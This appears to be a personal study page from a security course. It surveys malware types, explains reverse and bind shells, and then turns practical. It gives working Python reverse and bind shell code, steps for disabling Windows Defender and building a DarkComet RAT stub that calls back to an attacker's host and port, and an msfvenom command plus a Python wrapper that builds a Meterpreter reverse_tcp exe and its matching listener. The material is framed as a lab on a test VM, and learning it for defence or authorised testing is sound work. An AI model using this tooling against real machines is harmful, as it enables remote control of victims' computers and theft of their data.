Mar 29, 2020, 12:04 PM
Malware
what is it?
mal + ware = malicious software

designed to infiltrate and damage computers without the user's consent.
the term malware encompasses all the different types of threats to your computer, such as:
viruses, spyware, worms, trojans etc.

Purpose of Malware !!
why does malware exist? why was it created in the first place?
> to do things without the user's permission
> to steal files
> to steal stored passwords
> to hijack the computer
> to hijack core computing functions
> to monitor the activity of the user
> to delete sensitive personal data
> to encrypt sensitive data
> to extort money

Types of Malware :

1. Virus: "vital information resources under siege" is a popular backronym, not where the term comes from (it is borrowed from biology)
 disrupts the normal functionality of the computer

 they are generally attached to executable files (i.e. attached to exe files)
 the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious program.
 Normally, the host program keeps functioning after it is infected by the virus.
 a virus cannot spread across the network on its own: it replicates by attaching itself to other files locally, and it needs a host program and a user action (running the infected file) to spread.
 Viruses spread when the software or document they are attached to is transferred from one computer to another using the network,
 a disk, file sharing, or infected email attachments.

2. Worm:
similar to viruses, but a worm can also spread by itself across the network
self-replicating without a host program; spreads without any human interaction or directives from the malware authors.
worms are standalone software and do not require a host program or human help to propagate
A worm enters a computer through a vulnerability in the system and takes advantage of
file-transport or information-transport features on the system, allowing it to travel unaided

stuxnet ::::::::::::: https://www.youtube.com/watch?v=TGGxqjpka-U

3. Trojan
malicious s/w that presents itself as legitimate
> A Trojan is another type of malware, named after the wooden horse that the Greeks used to infiltrate Troy.
> It is a harmful piece of software that looks legitimate. Users are typically tricked into loading and executing it on their systems.
> After it is activated, it can carry out any number of attacks on the host, from irritating the user (popping up windows or changing desktops)
 to damaging the host (deleting files, stealing data, or activating and spreading other malware, such as viruses).
> Trojans are also known to create backdoors to give malicious users access to the system.
> Unlike viruses and worms, Trojans do not reproduce by infecting other files, nor do they self-replicate.
> Trojans must spread through user interaction such as opening an email attachment or downloading and running a file from the Internet.

https://www.youtube.com/watch?v=Td1uPq9K--E


4. Spyware
Software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent,
 or that asserts control over a device without the consumer's knowledge.

5. Ransomware
a kind of malware that is used to extort money from the user it infects.
it encrypts the files on the user's system using a strong encryption algorithm, then demands a ransom in exchange for the decryption key needed to retrieve / decrypt the user's data.
done properly (a per-file symmetric key, itself encrypted with the attacker's public key), the data cannot be recovered without the attacker's private key, which is why offline backups are the real defence.

6. Rootkit
Programs that hide the existence of malware by intercepting (i.e., "hooking") and modifying operating system API calls that supply system information.
Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system or lower, including a hypervisor, master boot record, or the system firmware.
 Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.
 Rootkits have been seen for Windows, Linux, and Mac OS X systems.

7. Keyloggers
a special kind of spyware
The action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored.
Data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

What are shells?
A shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device (servers, mobile phones, etc.).

Types of shells
1. Reverse shell
2. Bind shell

Reverse shell
A reverse shell is a type of shell in which the target machine connects back to the attacking machine. The attacking machine runs a listener on a port; once the target connects to it, the attacker sends commands over that connection and gets code or command execution on the target.
Because the connection is outbound from the target, a reverse shell usually gets through NAT and firewalls that block inbound connections to the target.

Figure 1: Reverse TCP shell


Bind shell
A bind shell is a type of shell in which the target machine opens a listening port on itself and waits for an incoming connection.
The attacker then connects to the target machine's listener, which leads to code or command execution on the target. The port has to be reachable from the attacker, so a bind shell is stopped by inbound firewall rules or NAT that a reverse shell would get through.

Figure 2: Bind TCP shell
There are a number of popular shell files. To name a few: Reverse TCP Meterpreter, C99 PHP web shell, JSP web shell, Netcat, etc.
 One thing which is common between all these shells is that they communicate over TCP (web shells over HTTP, which itself runs on TCP). TCP is the usual transport, but shells that tunnel over UDP, HTTP(S) or DNS also exist.
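The two directions described above, as an added example that is not part of the original notes: a minimal reverse shell and a minimal bind shell in Python, with both the attacker side and the target side in one script, running over loopback. The wire format (one command per line, reply prefixed with a 4-byte length) is constructed for this example; real tools such as Netcat or Meterpreter use their own. The only thing that differs between the two shell types is which side listens and which side connects; the command-execution code is shared.

```python
"""Reverse shell vs bind shell: both ends of each, on loopback.

Added example for the notes above, not from the original page. The wire
format is constructed for this example: the attacker sends one command
per line, the target runs it with the system shell and replies with the
output prefixed by a 4-byte big-endian length.
"""
import socket
import struct
import subprocess
import threading

HOST = "127.0.0.1"  # loopback so "attacker" and "target" are the same box


def _send_msg(sock, data):
    sock.sendall(struct.pack(">I", len(data)) + data)


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def _recv_msg(sock):
    (size,) = struct.unpack(">I", _recv_exact(sock, 4))
    return _recv_exact(sock, size)


def serve_commands(sock):
    """Target side, shared by both shell types: run each received line, send back its output."""
    with sock, sock.makefile("rb") as lines:
        for line in lines:
            cmd = line.decode().strip()
            if cmd == "exit":
                break
            result = subprocess.run(cmd, shell=True, capture_output=True)
            _send_msg(sock, result.stdout + result.stderr)


def drive_commands(sock, commands):
    """Attacker side, shared by both shell types: send commands, collect the replies."""
    outputs = []
    with sock:
        for cmd in commands:
            sock.sendall(cmd.encode() + b"\n")
            outputs.append(_recv_msg(sock).decode(errors="replace"))
        sock.sendall(b"exit\n")
    return outputs


def _listener():
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((HOST, 0))  # port 0: let the OS pick a free port
    s.listen(1)
    return s


def reverse_shell_demo(commands):
    """Reverse shell: the ATTACKER listens (LHOST:LPORT); the TARGET connects out to it."""
    listener = _listener()
    lport = listener.getsockname()[1]

    def target_side():
        # what the payload on the victim does: an outbound connection to LHOST:LPORT
        serve_commands(socket.create_connection((HOST, lport)))

    t = threading.Thread(target=target_side, daemon=True)
    t.start()
    conn, _ = listener.accept()
    listener.close()
    outputs = drive_commands(conn, commands)
    t.join()
    return outputs


def bind_shell_demo(commands):
    """Bind shell: the TARGET listens on its own port; the ATTACKER connects in."""
    listener = _listener()  # on the victim: must be reachable through any firewall/NAT
    port = listener.getsockname()[1]

    def target_side():
        conn, _ = listener.accept()
        listener.close()
        serve_commands(conn)

    t = threading.Thread(target=target_side, daemon=True)
    t.start()
    outputs = drive_commands(socket.create_connection((HOST, port)), commands)
    t.join()
    return outputs


if __name__ == "__main__":
    print("reverse:", reverse_shell_demo(["echo hello from reverse shell"]))
    print("bind:   ", bind_shell_demo(["echo hello from bind shell"]))
```

Run it with `python3 shells.py`; each demo prints the output of the `echo` that the target side executed. On a real engagement only the `target_side` body would run on the victim and the listener/connect code on the attacker machine, with `HOST` set to the attacker's LHOST for the reverse shell or the victim's address for the bind shell.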
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Creating Malware
RAT: Remote Administration Tool (in a security context, remote access trojan). In DarkComet's terminology the "server" is the stub that runs on the victim and the "client" is the attacker's control panel.
Dark Comet Example

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
disable windows defender (on the windows 10 test VM; the stub is not obfuscated, so it is detected otherwise)
open dark comet
server module (create server) --> full editor
process mutex --> threads (the mutex name is what stops a second copy of the stub from running on the victim; DarkComet's default mutex name is also a well-known indicator for it)
n/w setting --> enter lhost lport here --> press add
lhost/lport is where the stub will connect back to (the attacker machine and its listening port), so the client has to be listening on that same port
listen for connection (in the DarkComet client: this opens the socket on the attacker machine that waits for the stub's incoming connection)

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Msfvenom

Creating Metasploit Payloads

Often one of the most useful (and to the beginner underrated) abilities of Metasploit is payload generation, originally the msfpayload utility and now msfvenom. Many different payloads can be created with it, which
 can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler.
 Run 'set payload' with the same payload you gave to msfvenom and configure all necessary options (LHOST, LPORT, etc.); the handler only understands the incoming connection if its payload, arch and port match what was generated.
 Execute and wait for the payload to be run. For the examples below it's pretty self-explanatory, but LHOST should be filled in with your IP address
 (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.


> how to create a malicious file .. will not be obfuscating the file / hiding the file
> will be using reverse tcp
> an unobfuscated reverse tcp meterpreter payload is well known to AV, so Windows Defender will flag the file (and the plain reverse tcp connection is easy to spot on the network)
> staging and encoding techniques not covered (windows/x64/meterpreter/reverse_tcp is staged: the exe only contains a small stager that connects back and fetches the rest of meterpreter from the handler; the stageless equivalent is windows/x64/meterpreter_reverse_tcp)

List payloads
msfvenom -l payloads


msfpayload + msfencode = msfvenom (both old tools were retired in 2015 and msfvenom replaced them)
msf - metasploit framework
kali needed + windows 10 (defender disabled)

--browser may detect it when downloading --antivirus may detect it---
msfvenom -p windows/x64/meterpreter/reverse_tcp --arch x64 --platform windows LHOST=<your IP> LPORT=53 -f exe -o <output>.exe
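The msfvenom command and the matching multi/handler setup described above, as an added example that is not part of the original notes: a small Python wrapper that validates LHOST/LPORT, derives --arch and --platform from the payload name so they cannot disagree with -p, writes the handler as an msfconsole resource script, and runs msfvenom when it is installed. It assumes `msfvenom` and `msfconsole` are on PATH on the Kali box; the command-building functions run without them. The IP 192.0.2.10 is a documentation-range placeholder, and the staged/stageless check is a naming heuristic, not something Metasploit exposes.

```python
"""Build a matching msfvenom command and exploit/multi/handler resource script.

Added example, not from the original notes. The payload, arch and port
must agree between the generated exe and the handler; deriving both from
one set of values avoids the usual mismatch.
"""
import ipaddress
import shutil
import subprocess
from pathlib import Path

# Stage names that appear as their own path component in staged payloads
# (windows/x64/meterpreter/reverse_tcp); stageless ones fuse them with an
# underscore (windows/x64/meterpreter_reverse_tcp). Heuristic, assumption.
STAGES = {"meterpreter", "shell", "vncinject", "dllinject", "upexec"}


def check_lhost(lhost):
    """LHOST must be a real IP address (the notes' placeholder '124412' is rejected here)."""
    try:
        return str(ipaddress.ip_address(str(lhost)))
    except ValueError:
        raise ValueError(f"LHOST {lhost!r} is not an IP address") from None


def check_lport(lport):
    port = int(lport)
    if not 1 <= port <= 65535:
        raise ValueError(f"LPORT {lport!r} out of range")
    return port


def payload_arch(payload):
    """Platform is the first path component; arch is x64 if present, else x86."""
    parts = payload.split("/")
    return parts[0], ("x64" if "x64" in parts else "x86")


def is_staged(payload):
    """True for stager + stage payloads, where the handler must serve the stage."""
    parts = payload.split("/")
    return len(parts) >= 3 and parts[-2] in STAGES


def msfvenom_argv(payload, lhost, lport, out_file, fmt="exe"):
    platform, arch = payload_arch(payload)
    return [
        "msfvenom", "-p", payload,
        "--platform", platform, "--arch", arch,
        f"LHOST={check_lhost(lhost)}", f"LPORT={check_lport(lport)}",
        "-f", fmt, "-o", str(out_file),
    ]


def handler_rc(payload, lhost, lport):
    """Resource script for the listener; start it with: msfconsole -q -r handler.rc"""
    lines = [
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {check_lhost(lhost)}",
        f"set LPORT {check_lport(lport)}",
        "set ExitOnSession false",  # keep listening after the first session
        "exploit -j",               # run the handler as a background job
    ]
    return "\n".join(lines) + "\n"


def generate(payload, lhost, lport, out_dir="."):
    """Write handler.rc and, if msfvenom is installed, build the exe next to it."""
    out_dir = Path(out_dir)
    exe = out_dir / "payload.exe"
    (out_dir / "handler.rc").write_text(handler_rc(payload, lhost, lport))
    if shutil.which("msfvenom") is None:
        return None  # not a Kali box: the resource script is still written
    subprocess.run(msfvenom_argv(payload, lhost, lport, exe), check=True)
    return exe


if __name__ == "__main__":
    payload = "windows/x64/meterpreter/reverse_tcp"  # the payload from the notes
    lhost, lport = "192.0.2.10", 53                 # placeholder attacker address
    print(" ".join(msfvenom_argv(payload, lhost, lport, "payload.exe")))
    print(handler_rc(payload, lhost, lport))
    print("staged:", is_staged(payload))
    print("built:", generate(payload, lhost, lport))
```

Run `python3 gen.py` on the attacker machine, then `msfconsole -q -r handler.rc` before the exe is executed on the Windows 10 VM; a stageless payload (`meterpreter_reverse_tcp`) produces a larger exe but does not depend on the handler delivering the stage, which matters when the stager's callback is what gets caught.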